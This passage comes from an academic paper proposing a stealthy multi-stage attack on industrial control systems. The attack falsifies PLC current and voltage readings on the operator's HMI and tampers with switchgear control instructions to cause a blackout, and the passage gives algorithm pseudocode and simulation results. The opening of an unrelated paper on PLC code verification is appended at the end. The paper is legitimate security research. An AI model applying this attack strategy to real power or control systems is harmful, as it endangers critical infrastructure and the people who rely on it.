Analogously, the fault state set and critical state set are defined by:

    F = {x^Fau_1, x^Fau_2, ..., x^Fau_K},    (4)

and

    C = {x^Cri_1, x^Cri_2, ..., x^Cri_M},    (5)

where F and C are two subsets of X, and K and M are the numbers of fault states and critical states, respectively. Furthermore, the fault state vector and the critical state vector are defined by:

    x^Fau_k = (x^Fau_k,1, x^Fau_k,2, ..., x^Fau_k,N),    (6)

and

    x^Cri_m = (x^Cri_m,1, x^Cri_m,2, ..., x^Cri_m,N),    (7)

where x^Fau_k,i (1 <= k <= K and 1 <= i <= N) denotes the ith entry of the kth fault state vector, and x^Cri_m,j (1 <= m <= M and 1 <= j <= N) denotes the jth entry of the mth critical state vector. The three subsets N, F and C are mutually exclusive and together constitute the entire state set X, i.e., the pairwise intersections of N, F and C are empty and their union equals X.

B. SYSTEM STATE TRANSITION

Based on the definition of system states, we now define the state transition rules. Suppose that the system operator can configure the target system manually, i.e., issue the "open" or "close" instructions to change the status of switchgears. Therefore, we use a variable a in {-1, 1, 0} to denote the different operations the system operator can take on a switchgear. The values -1, 1, and 0 represent "open", "close" and no action, respectively. Suppose that there are N operable switchgears in the system, corresponding to the N configurable state variables mentioned above. An N-tuple vector a = (a_1, a_2, ..., a_N) is used to represent all operations taken by the system operator at a certain time point. Each entry a_i in {-1, 1, 0} denotes the operation taken on the ith state variable x_i.
State transition rules describe how the system behavior changes over time. We use x_i(t) and x_i(t+1) to denote the current state and the next state of the ith switchgear, respectively. An operation a_i(t) can drive x_i(t) to x_i(t+1), so we formalize the state transition of a switchgear as follows:

    x_i(t+1) = x_i(t) (*) a_i(t),    (8)

where the operator (*) defines the following rule:

    x_i(t+1) = a_i(t), if a_i(t) != 0;
    x_i(t+1) = x_i(t), otherwise.    (9)

This equation indicates that the next state x_i(t+1) is determined jointly by the current state x_i(t) and the current operation a_i(t). If no operation is taken (i.e., a_i(t) = 0), x_i(t+1) is set equal to x_i(t). Otherwise, x_i(t+1) is set equal to a_i(t). Therefore, the state transition of the entire system can be formalized by:

    x(t+1) = x(t) (*) a(t),    (10)

where the state transition of each element of the state vector x follows Eq. 8.

FIGURE 3. The System State Transition Graph.

The state transition graph is illustrated in Fig. 3. A normal state transits to a fault state if some unavoidable disturbances or faults occur. A fault state can return to a normal state after the necessary services are restored. However, if the target system encounters a malicious attack, it is likely to enter a critical state from a normal state or a fault state.
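The elementwise rule in Eqs. (8)-(10) is simple enough to state directly in code. The following Java sketch is our own illustration (the class and the int-array encoding are assumptions, not the paper's simulator): an explicit command overrides a switchgear's state, while "no action" leaves it unchanged.

    import java.util.Arrays;

    // Sketch of the state transition rule of Eqs. (8)-(10): states and operations
    // are int arrays with x_i in {-1, 1} (open/closed) and a_i in {-1, 1, 0}.
    public class StateTransition {

        // Elementwise operator of Eq. (9).
        static int[] apply(int[] state, int[] operation) {
            int[] next = new int[state.length];
            for (int i = 0; i < state.length; i++) {
                next[i] = (operation[i] != 0) ? operation[i] : state[i];
            }
            return next;
        }

        public static void main(String[] args) {
            // Toy 3-switchgear example: the operator opens switchgear 0, leaves the rest alone.
            int[] x = { 1, 1, -1 };
            int[] a = { -1, 0, 0 };
            System.out.println(Arrays.toString(apply(x, a)));  // prints [-1, 1, -1]
        }
    }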
C. ATTACK STRATEGY

With the definition of system states and state transition rules, we now describe the strategy of the enhanced multi-stage semantic attack against ICS. The attack strategy mainly consists of measurement data deception and control instruction manipulation. During measurement data deception, a fake view of the process data is presented to the HMI, so as to induce the system operator to take some unnecessary operations. Afterwards, the issued instructions are tampered with by the attacker to achieve specific attack goals. Below we elaborate on the two attack steps.

1) MEASUREMENT DATA DECEPTION

During measurement data deception, the attacker can change the measurement data, e.g., current and voltage values reported by victim PLCs, to any legitimate value, thus bypassing IDS. Suppose that the victim PLCs are those controlling the top line in Fig. 2 (i.e., PLC01 to PLC06). The left graph in Fig. 4 shows the actual values of the current and voltage reported by PLC01. The right graph depicts the fake values of the same measurement data presented to the HMI. When the system is attacked (from 240s to 270s), zero current and zero voltage are presented to the HMI. The fake view simulates a natural fault on the top line, so it is not regarded as a malicious attack. In other words, the attack is totally stealthy. The fake view misleads the system operator into taking unnecessary remediation measures, which may be costly and harmful. Furthermore, it provides the attacker a good opportunity to manipulate the control instructions maliciously.

2) CONTROL INSTRUCTION MANIPULATION

Once the system operator observes the zero current and zero voltage reported by remote PLCs for a period of time, he will drive the system to a fault state by issuing specific control instructions. Suppose that a set of control instructions denoted by a_{nl->fk} is issued to change the status of one or more switchgears. At this moment, the attacker can change the vector a_{nl->fk} to a malicious one a_{nl->cm} before the instructions reach their destinations, thus bringing the system into a critical state. Here, a_{nl->fk} and a_{nl->cm} are the operation vectors that can drive the system from the normal state to a fault state and a critical state, respectively. In order to bypass intrusion detection, the tampered instructions should meet the following two conditions: 1) |a_{nl->fk}| = |a_{nl->cm}| and 2) a_{nl->fk} != a_{nl->cm}, where |a| = (|a_k|), 1 <= k <= N, denotes the vector of absolute values of a's elements. Thus, no existing instruction is dropped and no fabricated instruction is injected. Additionally, all instruction values remain legitimate in the tampered messages, so the attack is totally stealthy.

If the attacker fails to manipulate the instructions in this step, he has another chance. When the system has restored the necessary services, it should return to the normal state from the fault state once the system operator issues the corresponding instructions a_{fk->nl}. At this moment, the attacker can rewrite a_{fk->nl} into a malicious vector a_{fk->cm}, in order to bring the system into a critical state. Analogously, a_{fk->cm} should satisfy |a_{fk->nl}| = |a_{fk->cm}| and a_{fk->nl} != a_{fk->cm}. Once the system enters a critical state, the attack goal is achieved.

The entire procedure of the Enhanced Multi-Stage Semantic Attack (EM2SA for short) is summarized in Algorithm 1. The normal, fault and critical system state sets are used as inputs to the algorithm. The output of the algorithm is a boolean variable flag that indicates whether the semantic attack is successful or not.

FIGURE 4. Measurement Data Deception Attack.

Algorithm 1 EM2SA Algorithm
Input: the normal, fault and critical system state collections N, F and C
Output: a flag indicating whether the attack is successful or not
    1:  flag <- false;
    2:  construct the state transition graph G;
    3:  penetrate the control network to get a Man-In-The-Middle position;
    4:  launch the measurement data deception attack when state_system is in N;
    5:  while true do
    6:    tamper with the control instruction a_{nl->fk} to a_{nl->cm}, which satisfies |a_{nl->fk}| = |a_{nl->cm}| and a_{nl->fk} != a_{nl->cm};
    7:    wait for the system state transition;
    8:    if state_system is in C then
    9:      flag <- true;
    10:     break;
    11:   else
    12:     launch the measurement data deception attack;
    13:     tamper with the new control instruction a_{fk->nl} to a_{fk->cm}, which satisfies |a_{fk->nl}| = |a_{fk->cm}| and a_{fk->nl} != a_{fk->cm};
    14:     wait for the system state transition;
    15:     if state_system is in C then
    16:       flag <- true;
    17:       break;
    18:     end
    19:   end
    20: end
    21: return flag;

The initial value of flag is set to false, as shown in line 1. Lines 2 and 3 make some preparations, including building the state transition graph and getting a Man-In-The-Middle position in the control network. Lines 4 to 20 are the whole procedure of the semantic attack. Line 4 launches the measurement data deception attack when the system operates normally, which presents a fake view of the measurement data to the HMI. Afterwards, the attacker tampers with the instructions issued by the system operator and waits for the system state transition (lines 6 and 7). If this attack is successful (i.e., the system enters a critical state: state_system is in C), the output variable flag is set to true and the attack procedure ends (lines 8 to 10). Otherwise, the attacker has another chance to manipulate the control instructions when the system is going back to the normal state, as shown in lines 11 to 19. If both attacks are unsuccessful, the attacking procedure should be restarted; line 21 returns the output variable flag.
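As a way to see the control flow of Algorithm 1 outside the simulator, the following Java sketch mirrors its two tampering chances. It is only an illustration under our own assumptions: the state encoding, the critical-state test and the tampered operation vectors are placeholders supplied by the caller, not the authors' Java implementation.

    import java.util.function.Predicate;

    // Control-flow sketch of Algorithm 1 (EM2SA). Encodings and helper names are
    // assumptions for illustration.
    public class Em2saSketch {

        // Eq. (9) applied elementwise: a nonzero command overrides the switchgear state.
        static int[] transition(int[] state, int[] operation) {
            int[] next = state.clone();
            for (int i = 0; i < next.length; i++) {
                if (operation[i] != 0) next[i] = operation[i];
            }
            return next;
        }

        // tamperedOp1 plays the role of a_{nl->cm}, tamperedOp2 the role of a_{fk->cm};
        // isCritical is the membership test for the critical state set C.
        static boolean em2sa(int[] state, int[] tamperedOp1, int[] tamperedOp2,
                             Predicate<int[]> isCritical) {
            int[] afterFirst = transition(state, tamperedOp1);       // lines 6-10
            if (isCritical.test(afterFirst)) return true;
            int[] afterSecond = transition(afterFirst, tamperedOp2); // lines 12-17
            return isCritical.test(afterSecond);
        }

        public static void main(String[] args) {
            // Toy system: two switchgears; "both open" (all -1) is treated as critical (blackout).
            Predicate<int[]> isCritical = s -> s[0] == -1 && s[1] == -1;
            int[] normal  = { 1, -1 };   // line switchgear closed, tie switchgear open
            int[] tamper1 = { -1, 0 };   // open the line switchgear, leave the tie open
            int[] tamper2 = { 0, 0 };
            System.out.println(em2sa(normal, tamper1, tamper2, isCritical)); // prints true
        }
    }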
V. EXPERIMENTS AND DISCUSSION

In this section, we simulate the above-mentioned electricity distribution subsystem in the Java language and launch two different semantic attacks on the simulated system. The architecture of the simulated ICS is depicted in Fig. 2, including a substation and two radial distribution lines, each with a group of PLCs. One virtual machine is used to simulate the HMI, which acts as the Modbus master. Other virtual machines simulate the remote PLCs, which serve as the Modbus slaves. On the simulated system, we launch two attacks: the enhanced multi-stage semantic attack proposed in this work and the instruction-reversing semantic attack proposed in [17], and compare the success rates of the two attacks.

FIGURE 5. Normal Measurement Data.

We present the normal current values reported by three key PLCs (PLC01, PLC07 and PLC11) and the normal voltage value reported by PLC01 in Fig. 5. The voltage value remains stable, while the current values measured by PLC01 and PLC11 vary with the changing loads. The switchgear controlled by PLC07 remains open when the system operates normally, so the current reported by PLC07 is zero.

FIGURE 6. The Fake and Actual Measurement Data during the Instruction-Reversing Semantic Attack [17].

Fig. 6a and Fig. 6b respectively show the fake measurement data presented to the HMI and the actual measurement data when the system encounters the instruction-reversing semantic attack proposed in [17]. As we can see from Fig. 6a, the measurement data deception starts at 210s. After that, the system operator observes the zero current and zero voltage at PLC01 on the HMI. Therefore, the system operator issues control instructions to open the switchgear controlled by PLC01 and close the switchgear controlled by PLC07 at 240s. Thus the system enters a fault state and the top line begins to restore necessary services. After 240s, the HMI is still provided with a fake view of the measurement data: small values of the current and voltage at PLC01, misleading the system operator into believing the system is being restored. After a period of time, the operator issues control instructions to connect the switchgear controlled by PLC01 and disconnect the switchgear controlled by PLC07 at 270s, in order to bring the system back to normal. Afterwards, the attacker shows the normal current and voltage values to the HMI, presenting an illusion that the system has returned to normal.

FIGURE 7. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by One-Step Instruction Tampering.

However, the actual status of the system is shown in Fig. 6b. The attacker reverses each control instruction at 240s and 270s. In detail, the switchgears controlled by PLC01 and PLC07 are respectively closed and opened at 240s, and then respectively opened and closed at 270s. Therefore, the two switchgears maintain the status quo from 240s to 270s, and the measurement data are normal during this period. From 270s, the system enters a superfluous fault recovery phase, so the currents at PLC01 and PLC07 and the voltage at PLC01 are significantly smaller than their normal values. Therefore, the attack goal is not achieved since the system does not enter a critical state. Fig.
7 shows the fake and actual measurement data dur- ing the enhanced multi-stage semantic attack proposed in this work. Firstly, we suppose that the rst-step instruction tampering succeeds. Similar to Fig. 6a, Fig. 7a shows that the measurement data deception starts at 210s. After tam- pering with the ``fault recovery'' instructions successfully, the attacker presents the small current and voltage values to the HMI after 240s, misleading the system operator into believing the system is being restored. However, as shown in Fig. 7b, the attacker manipulates the instructions strate- gically at 240s according to Algorithm 1, i.e., reversing the instruction sent to PLC01 while keeping the instruc- tion sent to PLC07 unchanged, in order to bring the sys- tem into a critical state. Hence, the actual current and voltage at PLC01 become zero at 240s, which indicates a blackout on the top transmission line, so the attack goal is achieved. VOLUME 7, 2019 156879 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 8. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by Two-Step Instruction Tampering. If the rst-step instruction tampering is unsuccessful, the attacker has another chance. As depicted in Fig. 8, the attacker fails to tamper with the control instructions at 240s, but succeeds to manipulate the instruction sent to PLC01 at 270s. Therefore, the system enters a critical state after 270s (both the current and voltage at PLC01 become zero), as shown in Fig. 8b, but the fake measurement data pre- sented to the HMI are normal after 270s, as shown in Fig. 8a. Figs. 7 and 8 indicate that there are two possible paths from the normal state to a critical state during the enhanced multi-stage semantic attack, which are represented by the two red dashed lines in Fig. 9. Specially, if the attacker can randomly choose one or more instructions to tamper with during the instruction-reversing semantic attack proposed in [17], the proposed enhanced semantic attack is a special case of that kind of attack. Addi- tionally, suppose that each instruction tampering attack has a Possibility of Failure (PoF for short). Based on the assump- tions, we compare the success rate of the two kinds of seman- tic attacks on the simulated system. The instruction-reversing semantic attack can randomly choose whether to reverse FIGURE 9. Two Attack Paths During the Enhanced Semantic Attack. an eavesdropping instruction, while the enhanced semantic attack manipulates an instruction strategically according to Algorithm 1. In this experiment, PoF varies from 0.1 to 0.9, with a step value of 0.1. For each value of PoF, we conduct 5000 simulations for each attack. The comparison of the two attacks is illustrated in Fig. 10. Obviously, the success rate of the enhanced multi-stage semantic attack is signi cantly 156880 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 10. Comparison of Attack Success Rates of Two kinds of Attacks. higher than that of the instruction-reversing attack, which veri es the stronger attack ability of the enhanced attack. VI. CONCLUSION In this paper, we propose an enhanced multi-stage semantic attack against ICS. During this attack, a fake view of mea- surement data is rst presented to the HMI to mislead the system operator into issuing unnecessary control instructions. 
Thus, the attacker has chances to manipulate the control instructions strategically according to system state transition rules, and precisely bring the target system into a critical state. In the meanwhile, the measurement data deception attack should be continued in order to conceal the on-going attack. Furthermore, this attack is totally stealthy, since the command sequences, message sizes, and process values all remain legitimate. To verify the strong attack ability of the enhanced multi-stage semantic attack, we simulate an elec- tricity distribution subsystem in Java language. Additionally, we compare the attack success rate of the enhanced semantic attack with that of the existing instruction-reversing seman- tic attack. The experimental results show that the enhanced semantic attack can signi cantly improve the attack success rate. In future research, we will try to investigate the pro- posed attack on some real-world and large-scale ICS testbeds and seek for effective countermeasures against this kind of attacks, e.g., securing the communication channel via crypto- graphic means, e.g., by adding data integrity protections such as digital signatures or message authentications to prevent the attacker from modifying packets. REFERENCES [1] K. Stouffer, J. Falco, and K. Scarfone, ``Guide to industrial control systems (ics) security,'' NIST Special Publication , vol. 800, no. 82, p. 16, 2011. [2] J. Tian, R. Tan, X. Guan, and T. Liu, ``Enhanced hidden moving tar- get defense in smart grids,'' IEEE Trans. Smart Grid , vol. 10, no. 2, pp. 22082223, Mar. 2019. [3] Y. Mo, T. H.-J. Kim, K. Brancik, D. Dickinson, H. Lee, A. Perrig, and B. Sinopoli, ``Cyberphysical security of a smart grid infrastructure,'' Proc. IEEE , vol. 100, no. 1, pp. 195209, Jan. 2012. [4] T. Liu, Y. Liu, Y. Mao, Y. Sun, X. Guan, W. Gong, and S. Xiao, ``A dynamic secret-based encryption scheme for smart grid wireless communication,'' IEEE Trans. Smart Grid , vol. 5, no. 3, pp. 11751182, May 2014.[5] S. Yin, S. X. Ding, A. Haghani, H. Hao, and P. Zhang, ``A comparison study of basic data-driven fault diagnosis and process monitoring methods on the benchmark Tennessee Eastman process,'' J. Process Control , vol. 22, no. 9, pp. 15671581, 2012. [6] J. Weiss, ``Industrial control system (ics) cyber security for water and wastewater systems,'' in Securing Water and Wastewater Systems . Cham, Switzerland: Springer, 2014, pp. 87105. [7] M. R. Akhondi, A. Talevski, S. Carlsen, and S. Petersen, ``Applications of wireless sensor networks in the oil, gas and resources industries,'' inProc. 24th IEEE Int. Conf. Adv. Inf. Netw. Appl. (AINA) , Apr. 2010, pp. 941948. [8] A. D. Papadopoulos, A. Tanzman, R. A. Baker, Jr., R. G. Belliardi, and D. J. Dube, ``System for remotely accessing an industrial control system over a commercial communications network,'' U.S. Patent 6 061 603 A, May 9, 2000. [9] R. K. Koehler, ``When the lights go out: Vulnerabilities to us critical infras- tructure, the russian cyber threat, and a new way forward,'' Georgetown Secur. Stud. Rev , vol. 7, no. 1, pp. 2736, 2018. [10] L. Maglaras, K. H. Kim, H. Janicke, M. A. Ferrag, S. Rallis, P. Fragkou, A. Maglaras, and T. J. Cruz, ``Cyber security of critical infrastructures,'' ICT Exp. , vol. 4, no. 1, pp. 4245, 2018. [11] J. Staggs, Adventures in Attacking Wind Farm Control Networks . Las Vegas, NV, USA: Black Hat, 2017. [Online]. Available: https://www. blackhat.com/docs/us-17/wednesday/us-17-Staggs-Adventures-In- Attacking-Wind-Farm-Control-Networks.pdf [12] D. 
[12] D. Ding, Q.-L. Han, Y. Xiang, C. Ge, and X.-M. Zhang, "A survey on security control and attack detection for industrial cyber-physical systems," Neurocomputing, vol. 275, pp. 1674-1683, Jan. 2018.
[13] Z. Ling, K. Liu, Y. Xu, Y. Jin, and X. Fu, "An end-to-end view of IoT security and privacy," in Proc. IEEE Global Commun. Conf. (GLOBECOM), Dec. 2017, pp. 1-7.
[14] P. Haller and B. Genge, "Using sensitivity analysis and cross-association for the design of intrusion detection systems in industrial cyber-physical systems," IEEE Access, vol. 5, pp. 9336-9347, 2017.
[15] Z. Zhang, H. Zhu, S. Luo, Y. Xin, and X. Liu, "Intrusion detection based on state context and hierarchical trust in wireless sensor networks," IEEE Access, vol. 5, pp. 12088-12102, 2017.
[16] D. I. Urbina, J. A. Giraldo, A. A. Cardenas, N. O. Tippenhauer, J. Valente, M. Faisal, J. Ruths, R. Candell, and H. Sandberg, "Limiting the impact of stealthy attacks on industrial control systems," in Proc. ACM SIGSAC Conf. Comput. Commun. Secur., Oct. 2016, pp. 1092-1105.
[17] A. Kleinmann, O. Amichay, A. Wool, D. Tenenbaum, O. Bar, and L. Lev, "Stealthy deception attacks against SCADA systems," in Computer Security. Berlin, Germany: Springer, 2017, pp. 93-109.
[18] S. Cheung, B. Dutertre, M. Fong, U. Lindqvist, K. Skinner, and A. Valdes, "Using model-based intrusion detection for SCADA networks," in Proc. SCADA Secur. Sci. Symp., vol. 46, 2007, pp. 1-12.
[19] T. Morris, R. Vaughn, and Y. Dandass, "A retrofit network intrusion detection system for Modbus RTU and ASCII industrial control systems," in Proc. 45th Hawaii Int. Conf. Syst. Sci. (HICSS), Jan. 2012, pp. 2338-2345.
[20] H. Lin, A. Slagell, C. Di Martino, Z. Kalbarczyk, and R. K. Iyer, "Adapting Bro into SCADA: Building a specification-based intrusion detection system for the DNP3 protocol," in Proc. 8th Annu. Cyber Secur. Inf. Intell. Res. Workshop, Jan. 2013, p. 5.
[21] J. Hong, C.-C. Liu, and M. Govindarasu, "Detection of cyber intrusions using network-based multicast messages for substation automation," in Proc. ISGT, Feb. 2014, pp. 1-5.
[22] H. Hadeli, R. Schierholz, M. Braendle, and C. Tuduce, "Leveraging determinism in industrial control systems for advanced anomaly detection and reliable security configuration," in Proc. IEEE Conf. Emerg. Technol. Factory Autom. (ETFA), Sep. 2009, pp. 1-8.
[23] P. Stavroulakis and M. Stamp, The Handbook of Communication and Security. Cham, Switzerland: Springer, 2010.
[24] C.-H. Tsang and S. Kwong, "Multi-agent intrusion detection system in industrial network using ant colony clustering approach and unsupervised feature extraction," in Proc. IEEE Int. Conf. Ind. Technol. (ICIT), Dec. 2005, pp. 51-56.
[25] H. Wang, "On anomaly detection and defense resource allocation of industrial control networks," Ph.D. dissertation, College Control Sci. Eng., Zhejiang Univ., Hangzhou, China, 2014.
[26] L. A. Maglaras and J. Jiang, "Intrusion detection in SCADA systems using machine learning techniques," in Proc. Sci. Inf. Conf. (SAI), Aug. 2014, pp. 626-631.
[27] Y. Luo, "Research and design on intrusion detection methods for industrial control system," Ph.D. dissertation, College Control Sci. Eng., Zhejiang Univ., Hangzhou, China, 2013.
[28] I. Kiss, B. Genge, and P. Haller, "A clustering-based approach to detect cyber attacks in process control systems," in Proc. 13th IEEE Int. Conf. Ind. Inform. (INDIN), Jul. 2015, pp. 142-148.
[29] O. Linda, M. Manic, T. Vollmer, and J. Wright, "Fuzzy logic based anomaly detection for embedded network security cyber sensor," in Proc. IEEE Symp. Comput. Intell. Cyber Secur. (CICS), Apr. 2011, pp. 202-209.
[30] O. Linda, M. Manic, J. Alves-Foss, and T. Vollmer, "Towards resilient critical infrastructures: Application of Type-2 Fuzzy Logic in embedded network security cyber sensor," in Proc. 4th Int. Symp. Resilient Control Syst. (ISRCS), Aug. 2011, pp. 26-32.
[31] O. Linda, M. Manic, and T. Vollmer, "Improving cyber-security of smart grid systems via anomaly detection and linguistic domain knowledge," in Proc. 5th Int. Symp. Resilient Control Syst. (ISRCS), Aug. 2012, pp. 48-54.
[32] T. Vollmer and M. Manic, "Computationally efficient neural network intrusion security awareness," in Proc. 2nd Int. Symp. Resilient Control Syst. (ISRCS), Aug. 2009, pp. 25-30.
[33] O. Linda, T. Vollmer, and M. Manic, "Neural network based intrusion detection system for critical infrastructures," in Proc. Int. Joint Conf. Neural Netw. (IJCNN), Jun. 2009, pp. 1827-1834.
[34] A. Javaid, Q. Niyaz, W. Sun, and M. Alam, "A deep learning approach for network intrusion detection system," in Proc. 9th EAI Int. Conf. Bio-Inspired Inf. Commun. Technol. (Formerly BIONETICS) (ICST), May 2016, pp. 21-26.
[35] C. Hou, J. Hanhong, W. Rui, and L. Liu, "A probabilistic principal component analysis approach for detecting traffic anomaly in industrial networks," J. Xi'an Jiaotong Univ., vol. 46, no. 2, pp. 78-83, 2012.
[36] M. H. Aghdam and P. Kabiri, "Feature selection for intrusion detection system using ant colony optimization," Int. J. Netw. Secur., vol. 18, no. 3, pp. 420-432, May 2016.
[37] M. Krotofil, J. Larsen, and D. Gollmann, "The process matters: Ensuring data veracity in cyber-physical systems," in Proc. 10th ACM Symp. Inf., Comput. Commun. Secur., Apr. 2015, pp. 133-144.
[38] E. Colbert, D. Sullivan, S. Hutchinson, K. Renard, and S. Smith, "A process-oriented intrusion detection method for industrial control systems," in Proc. 11th Int. Conf. Cyber Warfare Secur. New York, NY, USA: Academic, 2016, p. 497.
[39] D. Hadžiosmanović, R. Sommer, E. Zambon, and P. H. Hartel, "Through the eye of the PLC: Semantic security monitoring for industrial processes," in Proc. 30th Annu. Comput. Secur. Appl. Conf., Dec. 2014, pp. 126-135.
[40] A. Carcano, A. Coletta, M. Guglielmi, M. Masera, I. N. Fovino, and A. Trombetta, "A multidimensional critical state analysis for detecting intrusions in SCADA systems," IEEE Trans. Ind. Informat., vol. 7, no. 2, pp. 179-186, May 2011.
[41] R. J. Patton, "Robustness in model-based fault diagnosis: The 1995 situation," Annu. Rev. Control, vol. 21, pp. 103-123, Jan. 1997.
[42] A. A. Cárdenas, S. Amin, Z.-S. Lin, Y.-L. Huang, C.-Y. Huang, and S. Sastry, "Attacks against process control systems: Risk assessment, detection, and response," in Proc. 6th ACM Symp. Inf., Comput. Commun. Secur., Mar. 2011, pp. 355-366.
[43] S. Sridhar and M. Govindarasu, "Model-based attack detection and mitigation for automatic generation control," IEEE Trans. Smart Grid, vol. 5, no. 2, pp. 580-591, Mar. 2014.

YAN HU was born in 1988. She received the B.S. degree in automation from Xi'an Jiaotong University, Xi'an, Shaanxi, China, in 2011, and the Ph.D. degree in computer science from the University of Chinese Academy of Sciences, Beijing, China, in 2017. Since 2017, she has been an Assistant Professor with the University of Science and Technology Beijing, China.
Her main research interests include the security of industrial control systems, the security of the Internet of Things, and service computing.

YUYAN SUN was born in 1982. He received the B.S. degree in computer science from Peking University, Beijing, China, in 2004, and the M.S. and Ph.D. degrees in computer science from the University of Chinese Academy of Sciences, Beijing, in 2007 and 2016, respectively. From 2007 to 2012, he was a Research Assistant with the Institute of Software, Chinese Academy of Sciences. Since 2016, he has been an Assistant Professor with the Beijing Key Laboratory of IoT Information Security, Institute of Information Engineering, Chinese Academy of Sciences, and the School of Cyber Security, University of Chinese Academy of Sciences. His main research interests include the security of industrial control systems and the IoT.

YOUCHENG WANG received the B.S. degree in telecommunications engineering from Hubei University, Wuhan, China, in 2011, and the Ph.D. degree in electromagnetic wave and microwave technology from the University of Chinese Academy of Sciences, Beijing, China, in 2016. From 2011 to 2016, he was a member of the Laboratory of Electromagnetic Radiation and Sensing Technology, Institute of Electronics, Chinese Academy of Sciences, Beijing. He is currently with the Beijing Electro-Mechanical Engineering Institute, Beijing. His research interests include the Internet of Things, ultrawideband (UWB) and array antennas, electromagnetic scattering characteristics, and the application of UWB radar.

ZHILIANG WANG was born in 1956. He received the B.S. degree in industrial automation from Yanshan University, Qinhuangdao, Hebei, China, in 1982, and the M.S. and Ph.D. degrees in electronic engineering from the Harbin Institute of Technology, Harbin, Heilongjiang, China, in 1985 and 1988, respectively. From 1988 to 1991, he was a Postdoctoral Researcher with Zhejiang University. Since 1991, he has been a Professor and a Ph.D. Supervisor with the University of Science and Technology Beijing, China. His main research interests include the Internet of Things and robot technology.
Methods_for_Reliable_Simulation-Based_PLC_Code_Verification.pdf
Simulation-based programmable logic controller (PLC) code verification is a part of virtual commissioning, where the control code is verified against a virtual prototype of an application. With today's general OPC interface, it is easy to connect a PLC to a simulation tool for, e.g., verification purposes. However, there are some problems with this approach that can lead to an unreliable verification result. In this paper, four major problems with the OPC interface are described, and two possible solutions to the problems are presented: a general IEC 61131-3-based software solution, and a new OPC standard solution.
IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012

Methods for Reliable Simulation-Based PLC Code Verification
Henrik Carlsson, Bo Svensson, Fredrik Danielsson, and Bengt Lennartson, Member, IEEE

Index Terms: Industrial control system, programmable logic controller (PLC), simulation, simulation-based PLC code verification, virtual commissioning.

I. INTRODUCTION

The term industrial control system is a broad definition for programmable controllers used in industry to control machines and processes. An example of an industrial control system commonly used in industry today is the Programmable Logic Controller (PLC). An industrial PLC handles not only discrete events and supervisory control; it also handles analogue feedback, motion control, positioning control, and other time-critical functions. Therefore, in this paper, PLC is used as a general name for industrial control systems. The most characteristic feature of PLCs is the reprogrammable control function that is described by the control code. PLCs are usually defined as hard real-time systems, which implies that the PLCs have a guaranteed scan cycle time and that the control code must be executed within this time frame [1].

Traditionally, the development of PLC-controlled applications, mechanical design and control code programming have been performed sequentially [2], [3] and partly online, where the control engineer has to wait with the programming, verification and optimization of the control code until the mechanical engineer is done with his or her work.

Manuscript received June 17, 2011; revised September 13, 2011; accepted November 16, 2011. Date of publication January 02, 2012; date of current version April 11, 2012. This work was supported in part by the European Commission Project FLEXA, under Grant 213734. Paper no. TII-11-287. H. Carlsson, B. Svensson, and F. Danielsson are with the Flexible Industrial Automation Research Group, Department of Engineering Science, University West, SE-46186 Trollhättan, Sweden (e-mail: [email protected]; [email protected]; [email protected]). B. Lennartson is with the Flexible Industrial Automation Research Group, Department of Engineering Science, University West, SE-46186 Trollhättan, Sweden, and also with the Department of Signals and Systems, Chalmers University of Technology, SE-41296 Göteborg, Sweden (e-mail: [email protected]). Digital Object Identifier 10.1109/TII.2011.2182653

A more attractive way is to do this concurrently and totally offline, where both the mechanical and the control engineers work in parallel [3], [4]. A common name for this offline and concurrent process planning approach is virtual commissioning [3]-[7]. A broad definition of virtual commissioning might include such tasks as design (e.g., fixtures, robot tools and factory layout), programming (e.g., PLC, robots, CNC machines, servo cams), verification and optimization [8], [9]. However, the focus in this paper is on simulation-based PLC code verification, where real PLCs are used together with simulation tools. Several examples exist of how industrial control systems and PLCs can be connected to simulation tools; two industrial de facto standards for this connection are RRS and OPC.
RRS is a standardized interface between a simulation tool and a representation of a robotic control system, while OPC is a more general approach for communication with PLCs and other control equipment. RRS has a synchronization mechanism that makes sure that all robot movements are simulated [10]. The more general approach, OPC, includes a number of specifications that define interfaces between PLCs and regular computer applications. Today, state-of-the-art robot simulation and discrete event system simulation tools implement an OPC client that allows PLCs to control the simulation model. However, OPC suffers a major drawback: no mechanism exists [10] that guarantees that all computations performed in the PLC are considered in the simulation. This can lead to two types of problem: 1) real-world errors are not discovered in the simulated world and 2) errors are discovered that do not exist in the real world.

In this paper, four major issues that will trigger the above-mentioned OPC problems are identified and discussed. These issues will cause unreliable PLC code verification. To solve these issues, two solutions are suggested: 1) an IEC 61131-3-based solution that could be implemented in a PLC at the design phase of the application and 2) a proposal for a new OPC interface that includes a mechanism to guarantee reliable PLC code verification. These solutions have been verified with a formal model, constructed in NuSMV [11], and proved to work. A case study is also presented to show the hazardous effect of unreliable PLC code verification.

II. INTERFACES BETWEEN PLCS AND CAPE TOOLS

Tools that could be used for simulation-based PLC code verification usually sort under Computer Aided Production Engineering (CAPE) tools. CAPE is a general term for production-related simulation tools. There are two main subtypes of tools [12]-[15]:
1) Discrete event system simulation (production flow simulation), which can be used to analyze performance or product flow in a cell, factory or enterprise. Months or even years of production can be simulated in a short while.
2) Robot simulation (geometric and kinematic simulation, or Computer Aided Robotics), where robots and other moving devices can be simulated and programmed offline.

A common feature of all these CAPE tools is their ability to handle several types of production scenario on different levels, where a variety of robots, machines, manufacturing resources, control logic representations, etc., are integrated in a unified simulation. However, the representation of the control functions in CAPE tools is usually conducted on a general level and described using a simplified model of the main functional behavior of the real PLC [16]. An example of a simplified control function representation in a CAPE tool is a Sequence of Operations list. Consequently, with simplified PLC models, the real control functions, including motion control, etc., are not executed.

A solution to the CAPE tools' drawback of simplified PLC models is to use hardware-in-the-loop simulation. Hardware-in-the-loop simulation, described in, e.g., [17] and [18], is a real-time simulation method in which real hardware, e.g., a PLC, is embedded in the simulation.
Hardware-in-the-loop simulation as a means of testing control systems is not new; the aerospace industry has been using this technique ever since software first became a safety-critical aspect of flight control systems [19].

